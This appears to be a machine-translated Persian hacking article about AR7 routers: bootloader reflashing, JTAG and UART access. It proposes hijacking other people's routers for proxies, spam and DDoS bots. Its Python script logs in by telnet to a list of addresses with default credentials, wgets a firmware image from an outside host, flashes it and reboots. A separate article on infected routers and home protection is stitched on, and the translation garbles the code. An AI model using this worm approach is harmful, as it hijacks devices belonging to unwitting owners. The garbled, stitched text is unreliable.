ورود / رمز عبور - adam2 / adam2. فرآیند فلش کردن بسیار ساده است. برای شروع
جلسه FTP را به حالت باینری تغییر دهید:

ftp> نقل قول MEDIA FLSH

حالا مثلا یک تصویر از فایل سیستم ارسال می کنیم و مکان را مشخص می کنیم
مقصد:

ftp> قرار دادن fs.img "fs.img mtd0"

ما منتظر پایان ضبط هستیم، روتر را راه اندازی مجدد کنید، از جلسه خارج شوید:

ftp> نقل قول راه اندازی مجدد
ftp> ترک

همه! همانطور که می بینید، هیچ چیز سختی وجود ندارد، حالا اگر مشکلی پیش بیاید، شما
شما همیشه می توانید همه چیز را درست کنید

برای راحتی، باید یک آدرس IP معمولی را فعال کنید
دانلود خودکار (به طوری که با تنظیم مجدد رقص نکنید) و کمی زمان را افزایش دهید
قبل از بارگیری کرنل منتظر اتصال باشید. تمام این تنظیمات در آن ذخیره می شود
متغیرهای محیطی، دستورات ویژه ADAM2 FTP وجود دارد: GETENV و SETENV (برای
دریافت و تنظیم یک متغیر به ترتیب). در جلسه FTP موارد زیر را وارد کنید
دستورات:

ftp> بارگذاری خودکار SETENV، 1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> نقل قول راه اندازی مجدد
ftp> ترک

روتر راه اندازی مجدد می شود و می توانید در 192.168.1.1:21 به ADAM2 بروید. اگر یک
تمایل به بازتاب مجدد تصویر هسته وجود خواهد داشت و هسته از بوت کردن، FTP خودداری می کند.
خود به خود شروع خواهد شد قبل از فلش زدن با تصاویر اصلاح شده، حتما
موارد فعلی را برای بازیابی ذخیره کنید. به طور کلی می توانید متغیرهای محیط را تغییر دهید
و از طریق /proc/ticfg/env، من فقط می خواستم در مورد کار با FTP بیشتر صحبت کنم.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

و می توانید تغییرات را به صورت زیر بررسی کنید:

# cat /proc/ticfg/env | grep my_ipaddress

اگر می خواهید بوت لودر را فلش کنید چه باید کرد و چگونه
در صورت شکست اقدام کنیم؟ یا روتر به دلایلی شروع نمی شود و
به ADAM2 دسترسی ندارید؟ یک راه خروج وجود دارد - JTAG، یا بهتر است بگوییم، EJTAG در این تراشه وجود دارد
(نسخه توسعه یافته). این یک رابط برای اشکال زدایی / برنامه نویسی در مدار است.

برای اتصال به این رابط، به پورت LPT کامپیوتر نیاز داریم،
کانکتور و 4 مقاومت طرح ساده است.

من عجله می کنم که سیستم عامل از طریق JTAG یک تجارت سریع نیست، به اندازه کافی طول می کشد
زمان زیاد. بنابراین فقط باید برای بازیابی بوت لودر استفاده شود،
حتی اگر کار نکند برای برقراری ارتباط از طریق JTAG، باید از یک ویژه استفاده کنید
برنامه ای مانند UrJTAG. در زیر نمونه ای از نحوه عملکرد این رابط را مشاهده می کنید.
راه اندازی ارتباط:

jtag> کابل موازی 0x378 DLC5
jtag> شناسایی

تشخیص حافظه فلش:

jtag> detectflash 0x30000000 1

خواندن حافظه فلش:

jtag> readmem 0x30000000 0x400000 fullflash.img

نوشتن در حافظه (بوت لودر):

jtag> flashem 0x30000000 adam2.img

همچنین دانستن در مورد رابط UART مفید است (قولاً قول داده بودم در مورد آن صحبت کنم). AT
UART_A گزارش می دهد، یعنی بوت لودر ثبت می شود (در مرحله اولیه بوت شدن از
می توانید با او صحبت کنید) و هسته اصلی. هنگام نوشتن کرنل های اصلاح شده، این
برای رفع اشکال ضروری است. UART - گیرنده/فرستنده ناهمزمان جهانی
(فرستنده ناهمزمان جهانی) تقریباً همیشه روی آن وجود دارد
میکروکنترلرها

مدار آداپتور بسیار ساده است. بر اساس تنها یک تراشه -
مبدل سطح TTL: MAX232 برای COM و FT232R برای USB. ریز مدارها
بسیار رایج هستند و هیچ مشکلی در خرید وجود نخواهد داشت.

مدار روی تخته نان (که می تواند با خیال راحت در یک کیس قرار گیرد) مونتاژ می شود
کانکتور پورت COM) در 20 دقیقه و مزایای زیادی را به همراه دارد. به عنوان مثال، هنگام اشکال زدایی
هسته ها یک راه حل کاملاً ضروری هستند. و اگر الکترونیک سفت باشد؟ خارج شوید
کابل های USB برای گوشی های قدیمی هستند، آنها فقط یک مبدل دارند
UART - USB.

چند ایده توزیع

پروکسی/جوراب شما در روتر شخص دیگری عالی است. همانطور که در واقع، هرزنامه
روتر روی همه پروتکل ها این یک کامپیوتر ویندوزی برای شما نیست.
هر ماه دوباره چیدمان کنید :). روترها اغلب تغییر نمی کنند یا دوباره فلش می شوند. بله و
چه کسی، به جز ما، ایده آلوده کردن یک روتر را به ذهن می‌آورد؟

فراموش نکنید، ما تمام ترافیک کاربر/شبکه ​​را کنترل می کنیم. برای بیشتر
روترهای قدرتمند و در حال حاضر امکان آویز کردن یک ربات DDOS وجود دارد. مخفی کردن فایل/پنهان کردن فرآیند،
رهگیری نوشتن در بلوک های mtd، حذف پاک شدن برنامه ما - همه چیز
هر چه!

فرض کنید می خواهید شروع به نوشتن یک برنامه جدی برای روتر کنید.
اشکال زدایی بسیار خوب مهم است، احتمالاً باید بارها آن را انجام دهید
بازنویسی/بازیابی تصاویر... این یک چشم انداز بسیار غم انگیز است. حتی دست ها
اگر منبع بازنویسی حافظه فلش را نیز در نظر بگیریم کمی پایین تر است
کوچک (جزئیات بیشتر در اسناد مربوط به تراشه حافظه)، و چشم انداز وجود دارد
ولش کن اما راهی برای خروج وجود دارد! Qemu می تواند AR7 را تقلید کند! می توانید تصور کنید چه چیزی
آیا فرصت ها و راحتی بی حد و حصر را فراهم می کند؟ حالا هیچ چیز مانع ما نیست
چیزی فوق العاده جالب بنویس!

بنابراین. شما یک برنامه نوشتید، آن را در روتر خود یا 1-2 نفر دیگر بررسی کردید، اما
کل شبکه هنوز در پیش است، آلوده کردن دستی یک کار طاقت فرسا است، در روتر دهم که قبلاً شروع می کنید
لعنت بر همه دنیا و از ریسمان «گربه» و «متد» در چشمان شناور است. بیا بنویسیم
برنامه ای برای خودکارسازی این اقدامات روتین. من زبان پایتون را انتخاب کردم.

برنامه کاری عبارت است از:

  • جمع آوری لیستی از روترها، به عنوان مثال، با استفاده از nmap.
  • اسکریپت باید آدرس های IP را به ترتیب از لیست بگیرد، از طریق وارد کنید
    شبکه راه دور با ورود / رمز عبور استاندارد؛
  • سپس همان اقدامات: آپلود تصویر اصلاح شده،
    بازنویسی، راه اندازی مجدد

#!/usr/bin/env پایتون
#Encode=UTF-8

واردات telnetlib، زمان

SERVER="http://anyhost.com/fs.image"

برای adr در open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep (5)
telnet.write ("admin\n")
telnet.read_until("رمز عبور:")
telnet.write ("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget" + SERVER)
telnet.read_until("#")
telnet.write ("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write ("راه اندازی مجدد")
telnet.close()

منطق فیلمنامه خیلی با ایده آل فاصله دارد، حالا دلیلش را توضیح می دهم. برای
ابتدا باید نسخه سیستم عامل / هسته و مدل روتر را بررسی کنید، زیرا ممکن است وجود داشته باشد
تفاوت عمده در عملکرد علاوه بر این، به جای خالی های میان افزار، باید دانلود کنید
تصویر سیستم فایل از روتر، باز کردن بسته بندی، تغییر و ارسال
بازگشت. این امر باعث از بین رفتن مشکلات سازگاری با موارد مختلف می شود
مدل ها / نسخه های سیستم عامل، زیرا ثبات کار برای شما مهم ترین چیز است.
همچنین، یک ویروس می تواند عملکرد یک کرم را داشته باشد و در صورت تمایل، همیشه می توانید
یک اسکنر شبکه را به آن وصل کنید، نیروی brute force برای RDP و تراشه های مشابه.

روش توزیع عالی دیگری نیز وجود دارد. هیچ چیز شما را از نوشتن باز نمی دارد
برنامه ای برای ویندوز که همراه شما خواهد بود (یا دانلود کنید
سرور) تصویری از سیستم فایل و در صورت وجود، روتر را با آن آلوده کنید.
این برنامه را به همه روش های "استاندارد" توزیع کنید: درایوهای قابل جابجایی،
اکسپلویت برای برنامه ها، آلوده شدن برنامه های دیگر... ترکیب این روش ها،
می تواند یک بیماری همه گیر بزرگ باشد. فقط این عکس را تصور کنید
چنین دستگاه هایی در همه جا وجود دارند.

محافظت از روتر

پس از کاوش در تمام این موارد، فکر کردم: چگونه می توانم از روتر محافظت کنم؟ و سپس، می بینید،
خودم را می گیرم. اولین قدم این است که رمز عبور کاربر را به یک رمز عبور پیچیده تر تغییر دهید
طولانی (محدود - 8 کاراکتر)، تغییر بنرها و تبریک خدمات
(با یک ویرایشگر هگز، یا ترجیحاً برنامه ها را دوباره کامپایل کنید) تا
nmap یا سایر اسکنرها نمی توانند نسخه های خدمات را تعیین کنند.

همچنین باید پورت هایی را که شیاطین روی آن آویزان هستند تغییر دهید. این کار از طریق انجام می شود
تغییرات در progdefs.xml. Telnet را بکش (آسانترین راه برای انتخاب رمز عبور برای آن، بله
و پروتکل ناامن است، چرا به آن نیاز داریم)، ​​فایروال را روشن کنید، اتصال را مجاز کنید
به خدمات فقط از آدرس IP یا MAC خود. از فایروال هم استفاده کنید
برای محافظت از یک شبکه یا یک کامپیوتر، بیهوده نیست که وجود دارد. تنظیم شایسته
قوانین همیشه به محافظت کمک می کند.

نتیجه

نه تنها روترهای D-Link و سایر دستگاه های مشابه روی بسیاری ساخته شده اند
چیپ AR7، لیست شامل Acorp، NetGear، Linksys، Actionec... زیباست.
این AR7 همراه با MontaVista محبوب است. نتیجه می شود که با استفاده از همان
toolchain، بدون هیچ مشکلی می توانید مراحل توضیح داده شده در مقاله را انجام دهید.

در مورد آن فکر کنید: علاوه بر اقدامات مضر، می توانید کاری مفید / خوشایند برای خود نیز انجام دهید.
و دیگران (من بحث نمی کنم، لذت هک را نمی توان جایگزین کرد، اما هنوز).
شما می توانید سیستم عامل خود را بسازید، به عنوان مثال، روترهای قدرتمندتری که قادر به ساخت آن هستند
دانلود / توزیع تورنت ... همه مدل ها دارای رابط USB 1.1 هستند اما در جوان تر
مدل های آن لحیم کاری نشده است. یک ماژول USB و یک درایور سیستم فایل را به هسته اضافه کنید،
روتر را به حافظه فلش مجهز کنید - و در نتیجه، نوعی ذخیره سازی شبکه برای آن دریافت می کنید
پول کم. گزینه‌های زیادی وجود دارد، و ایده‌ها باید هزاران نفر مطرح شوند - نه
خود را محدود کنید، ایجاد کنید و خلق کنید!

خوانندگان عزیز. برای صرفه جویی در وقت شما. بلافاصله در مورد چیز اصلی. همه موارد زیر به وجود تروجان ها یا ویروس ها در رایانه شما به مدت 5 تا 7 روز کمک می کند. در این مدت، اسکن هایی از اینترنت وجود دارد، اما پس از هک، سکوت مشکوکی رخ می دهد - اسکن وجود ندارد - روتر آلوده دیگر اجازه ورود به رایانه شخصی را نمی دهد، دستورات را می پذیرد و آنها را اجرا می کند. این بر سرعت اینترنت تأثیر می گذارد - سقوط می کند.

اگر روتر شما قبلاً آلوده شده باشد، پس سرقت FTP، ایمیل و سایر رمزهای عبور موضوعی در آینده نزدیک است.

قبلاً در سال 2009 یکی از DroneBL جهان را در مورد اپیدمی (آغاز؟) ویروس هایی که روترها را تحت تأثیر قرار می دهند، مطلع کرد. اخبار او پس از حمله به سایت ظاهر شد، مدیران این سایت فاش کردند که این یک نوع اساساً جدید در بین حملات Ddos است. این حمله توسط روترهای آلوده انجام شد. بنابراین اکنون، "خانواده" رایانه های زامبی دوباره پر شده است - روترهای زامبی. یک شبکه بات نت کشف شد که از روترهای خانگی آلوده تشکیل شده بود! آنها این شبکه را "psyb0t" نامیدند. اینگونه بود که اپیدمی ویروس روتر رسما آغاز شد.

هک با اسکن پورت های روتر و در دست گرفتن کنترل روی آن رخ می دهد. متأسفانه، مقالاتی در اینترنت در مورد اینکه دقیقاً چگونه این یا آن مدل از روتر ساده ترین هک است، در حال افزایش است. اما آنجاست که می توانید یاد بگیرید چگونه از خود در برابر این فاجعه محافظت کنید. پس از کنترل روتر، جاسوسی از محتویات ترافیک عبوری آغاز شد. سرقت رمز عبور پیوستن به فعالیت های مخرب عمومی شبکه بات نت در اینترنت جهانی. اسکن پورت های یک کامپیوتر خانگی، اما در اینجا با جزئیات بیشتری صحبت خواهم کرد. نویسنده توانست ردیابی کند که وجود اتصال شبکه به یک روتر هک شده منجر به چنین مشکلاتی می شود. هنگام نصب مجدد فایروال در سیستم "از هیچ جا" ویروس ها ظاهر می شوند. هنگامی که سعی می‌کنید دبیان یا اوبونتو را هنگام دانلود به‌روزرسانی‌ها در طول مراحل نصب نصب کنید، این سیستم‌ها به درستی نصب نشدند. برای مثال

  1. راه اندازی Firestarter نصب شده غیرممکن است - عملکرد اداری راه اندازی می شود و تمام. یعنی چیزی با امتیازات مدیریت اجرا می شود، اما چیزی که مشخص نیست. Firestarter فقط شروع نمی شود.
  2. اگر اتصال به اینترنت وجود داشته باشد، Deadbeef شروع نمی شود، هنگامی که روتر خاموش است، بلافاصله روشن می شود.
  3. برخی از برنامه هایی که نیاز به امتیازات ادمین دارند بدون درخواست رمز عبور اجرا می شوند، بقیه اصلا اجرا نمی شوند.
  4. پس از نوشتن این مقاله، این نکات کمتر به چشم می خورد. یعنی مشکلاتی وجود خواهد داشت، اما آنها متفاوت به نظر می رسند.

نصب مجدد در همان رایانه، از همان دیسک نصب، با روتر خاموش، با موفقیت انجام شد. سیستم (تست شده در اوبونتو) مانند ساعت کار می کرد. این تعجب آور نیست، زیرا روترهایی با سیستم عامل لینوکس Mipsel اولین کسانی بودند که آسیب پذیر بودند. البته آسیبی که از یک روتر زامبی می‌آید «متنوع‌تر» از آن چیزی است که من در اینجا متوجه شدم و توضیح دادم، اما آنچه ما در حال حاضر ثروتمند هستیم همان چیزی است که به اشتراک می‌گذاریم...

ویندوز نصب شده (با روتر آلوده غیرفعال شده) "زنده ماند"، اما Agnitum Outpost Firewall Pro اسکن پورت ها را از همان دقایق اولیه پس از نصب شناسایی کرد. آن ها روتر به پورت(ها) حمله می کند.

برنج. اسکن پورت های من از اینترنت و در نهایت از یک روتر آلوده.

همانطور که در شکل مشاهده می کنید، در تاریخ 2017/04/27 در ساعت 23:51:16، یک اسکن قبلا از روتر زامبی انجام شد. قبل از آن، اسکن هایی از شبکه امنیتی کسپرسکی وجود داشت - 130.117.190.207 (دیوار آتش آنها را "پسند" نمی کند، اما این هنجار با نصب Kaspersky است) و مشخص نیست کجاست. و در تاریخ 04/27/12، روتر به تنظیمات کارخانه بازنشانی شد (Huawei HG530). از آن زمان، آنها فقط از شبکه امنیتی Kaspersky - 130.117.190.207 و ARP_UNWANTED_REPLY - می آیند - نویسنده فیلتر کردن ARP را روشن کرده است. بنابراین، تلاش‌های روتر برای "صحبت" مجدد با رایانه شخصی (این فعالیت عادی روتر است - اما اکنون Agnitum فقط به آن دسته از پاسخ‌های ARP که در پاسخ به درخواست رایانه شخصی من می‌آیند) و همچنین تلاش‌ها اجازه می‌دهد. توسط برخی از افراد برای رهگیری ترافیک با استفاده از یک پاسخ ARP جعلی، توسط فایروال مسدود می شوند. اگر کسی ترافیک من را به این طریق رهگیری کند و آن را از طریق رایانه خود عبور دهد، من در نقش یک کارمند دفتر با استفاده از اینترنت خواهم بود، در حالی که مدیر سیستم این شرکت همه اقدامات من را می بیند و گزارش مفصلی برای رئیس تهیه می کند. چند نامه (به چه کسی، در مورد چه چیزی) نوشته شده است، چند نفر در ICQ چت کرده اند. البته رمزهای ایمیل و غیره. آنها نیز می توانند سرقت کنند.

خط پایین - از لحظه ای که روتر خود را تنظیم مجدد کردم و آنچه را که در زیر توضیح خواهم داد انجام دادم، هیچ حمله ای از اینترنت وجود ندارد. "تفنگچی" حذف شده است، روتر تمیز است و فقط کاری را انجام می دهد که برای آن ایجاد شده است. اما تروجان روی رایانه شخصی نیز باید حذف شود، در غیر این صورت از قبل هکرها را به IP شما هدایت می کند.

کسانی که تجهیزات شبکه می سازند هیچ اقدام حفاظتی ارائه نمی دهند. دستورالعمل روترها حاوی توضیحاتی در مورد نحوه وارد کردن لاگین و رمز عبور برای دسترسی به ارائه دهنده است، اما هیچ کلمه ای وجود ندارد که رمز عبور پیش فرض ادمین را نمی توان در روتر گذاشت! علاوه بر این، روترها لزوما دارای کنترل از راه دور هستند که اغلب شامل آنها می شود. سازندگان نرم افزارهای ضد ویروس ساکت هستند. بی اختیار این سوال پیش می آید که چه کسانی از این کار سود می برند.

راه های عفونت

بهتره یه بار ببینی برای آن یک انیمیشن GIF با تجزیه و تحلیل شماتیک از موقعیت پیشنهاد می کنم. اگر قابل مشاهده نیست، Adblock یا چیزی شبیه به آن تداخل دارد - آن را در این صفحه خاموش کنید.

دو تا از آنها موجود است. اولین مورد از طریق WAN، با نام مستعار اینترنت است. آن ها هکرها IP شما را پیدا می کنند، به عنوان مثال، زمانی که فایل ها را با استفاده از پروتکل تورنت دانلود یا توزیع می کنید (در این مورد در انتهای مقاله بیشتر توضیح داده شده است) و با اسکن IP شما نقاط ضعفی در محافظت از روتر پیدا می کنند. اما کمتر رایج است. نحوه بستن این دروازه ها را در این مقاله بخوانید.

یا یک تروجان روی رایانه شخصی ما وجود دارد. و سپس هکرها را به IP پویا (!) ما هدایت می کند. با دانستن این آدرس، آنها قبلاً به طور روشی روتر را "چکش کاری" می کنند. در مورد تروجان ها در راه دوم عفونت خواندیم.

مورد دوم از طریق LAN است، یعنی از رایانه شما. اگر یک تروجان روی رایانه شخصی شما وجود داشته باشد، هکرها می توانند رمز عبور روتر را مستقیماً از رایانه شخصی شما حدس بزنند. بنابراین، این رمز عبور باید گاهی اوقات تغییر کند. اما در مورد این واقعیت که یک رایانه آلوده سعی می کند روتر را از سمتی هک کند که محافظت نمی کند، چه می شود؟ ابتدا باید بدانید که یک روتر تمیز با یک رایانه شخصی آلوده دوام زیادی نخواهد داشت. فورس معمولی (حدس زدن رمز عبور brute-force) آن را در عرض یک هفته یا حتی سریعتر از بین می برد. بنابراین، اگر مجبور هستید روتر خود را مرتباً تمیز کنید، وقت آن است که به پاکسازی کامل ویروس ها فکر کنید.

و الان لحظه ویروس / تروجان از کجا در رایانه شخصی می آید؟ دلایل اصلی و راه حل ها را در پرانتز لیست می کنم. گزینه ها عبارتند از:

1- ویندوز کرک شده اولیه نصب شده است (از دیسک های نصب تمیز استفاده کنید).

2- ویندوز را بعد از نصب غرغر کنید (یا تحمل کنید و ماهانه دوباره نصب کنید یا ویندوز بخرید).

3 - نرم افزار کرک شده (استفاده از برنامه های رایگان یا خرید پولی)

4 - ویروس در فایل های شخصی شماست (همانطور که در پاکسازی سیستم از ویروس ها توضیح دادم تمامی فایل های شخصی را از طریق پاکسازی اجرا کنید).

5 - سیستم قبلاً در حین استفاده از طریق فلش درایو آلوده شده است ، اینترنت ، جهنم می داند چگونه (محافظت - ما اینترنت را به روش ایمن مطالعه می کنیم ، در مورد درایوهای فلش ، در مورد آخرین نکته سکوت خواهم کرد).

به طور جداگانه، متذکر می شوم که با کشف IP روتر، هکرها شروع به اسکن آن می کنند تا به رمز عبور رمزگذاری شده دسترسی پیدا کنند و سپس با استفاده از رمز عبور سرقت شده، کنترل را به دست می گیرند. بنابراین، اگر اکنون به دسترسی به اینترنت نیاز ندارید، روتر را روشن نگذارید.

ولی!!! حتی اگر با استفاده از ماشین مجازی دانلود کنید، روتر شما شروع به چکش می کند. غیرفعال کردن آن و فعال کردن مجدد آن در این فرآیند به اینجا کمک می کند، و مهم ترین چیز پس از دانلود تورنت این است که ارائه دهنده یک IP پویا جدید پس از راه اندازی مجدد روتر صادر می کند و هکرها فقط باید حدس بزنند که آدرس شما در حال حاضر چیست. بر. و روتر شما هم... البته روی توزیع ها نمی مونید - بعد از اتمام دانلود باید فورا برنامه دانلودر تورنت رو خاموش کنید و بعد از اون روتر رو خاموش و روشن کنید.

و به طور کلی

روتر را غیر ضروری روشن نکنید! اجازه ندهید یک بار دیگر هکرهای کوچک وارد ملک خود شوند... فراموش نکنید که هر بار که سرعت اتصال به اینترنت بی دلیل کاهش می یابد، روتر را تمیز کنید. مراقب بودن ضرری نداره...

خب همه چی اکنون می توانید دستورالعمل های کارخانه روتر خود را بردارید و لاگین و رمز عبور صادر شده توسط ارائه دهنده اینترنت را مشخص کنید. این معمولاً در تب تنظیمات WAN انجام می شود. اکنون روتر شما از طریق اینترنت قابل کنترل نیست. حداقل فعلا.